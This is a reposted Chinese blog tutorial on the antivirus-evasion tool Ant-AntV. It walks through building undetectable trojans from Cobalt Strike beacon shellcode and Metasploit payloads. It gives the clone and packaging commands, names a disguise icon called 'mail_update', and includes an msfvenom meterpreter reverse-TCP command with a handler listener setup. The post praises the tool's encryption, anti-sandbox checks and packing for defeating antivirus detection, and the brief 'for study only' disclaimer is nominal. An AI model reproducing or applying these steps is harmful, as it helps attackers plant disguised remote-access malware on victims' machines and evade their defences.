本文我们来介绍一款在
Cs和Msf中较好的免杀工具吧。
注意: 本文仅供学习和研究。在了解技术和原理的前提下。更好的保护个人信息安全。反对一切危害网络安全的行为!造成法律后果与本文无关。
环境
-
Kali Linux -
python3.8
安装
git clone https://github.com/shellfeel/Ant-AntV
cd Ant-AntV
pip install -r requirements.txt
生成shellcode
这里我们以cs为例。生成.bin格式的。
将生成的shellcodebeacon.binbean_rawicomail_update.icogen_trojan.py 48行形参out_file_name 来更改,这个参数本身也是生成的程序名)放入resource目录 执行下面命令进行打包程序。
python gen_trojan.py
打包完成后,效果如下
msf
生成shell
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.12.22 LPORT=5555 -f raw -o 1.bin
利用上述同样的方式进行处理 配置msf
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.33
set LPORT 5555
exploit
免杀效果
(再此特别感谢群内小伙伴的测试!😘😘😘)
Cs成功上线
总结
使用随机密钥(混淆加密、shellcode加密),所以每次生成的程序都是全新的,避免被杀软散列标记导致全部失效。支持反沙箱逻辑、支持混淆、支持upx压缩。
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Msf Cs通用免杀项目
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/152727.html
